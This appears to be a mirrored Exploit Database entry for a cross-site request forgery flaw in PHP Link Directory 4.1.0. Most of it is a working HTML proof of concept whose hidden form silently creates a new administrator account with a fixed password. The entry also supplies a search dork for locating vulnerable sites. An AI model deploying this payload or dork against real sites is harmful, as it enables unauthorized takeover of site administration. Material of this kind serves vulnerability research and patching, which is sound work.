PHP Link Directory 4.1.0 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 39 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2011-01-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16037/

• PHP Link Directory v4.1.0 CSRF Vulnerability (Add Admin)
  ====================================================================
  
  ####################################################################
  .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
  .:. Script : http://www.phplinkdirectory.com/
  .:. Dork : "Powered by: PHP Link Directory"
  .:. Gr34T$ T0 [h1ch4m] & [Risky] & [www.Hack-Book.com] 
  
  ####################################################################
  
  ===[ Exploit ]===
  <html>
  <head>
  <title>PHP Link Directory v4.1.0 [Add Admin]</title>
  </head>
  <H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
  <form method="POST" name="form0" action="http://localhost/admin/conf_users_edit.php?action=N">
  <input type="hidden" name="LOGIN" value="webmaster"/>
  <input type="hidden" name="NAME" value="Mohammad Hussien"/>
  <input type="hidden" name="PASSWORD" value="123456"/>
  <input type="hidden" name="PASSWORDC" value="123456"/>
  <input type="hidden" name="LANGUAGE" value="sq"/>
  <input type="hidden" name="EMAIL" value="example@hotmail.com"/>
  <input type="hidden" name="cemail" value="1"/>
  <input type="hidden" name="LEVEL" value="1"/>
  <input type="hidden" name="formSubmitted" value="1"/>
  <input type="hidden" name="id" value=""/>
  <input type="hidden" name="exclude_id" value=""/>
  </form>
  
  </body>
  </html>
  ####################################################################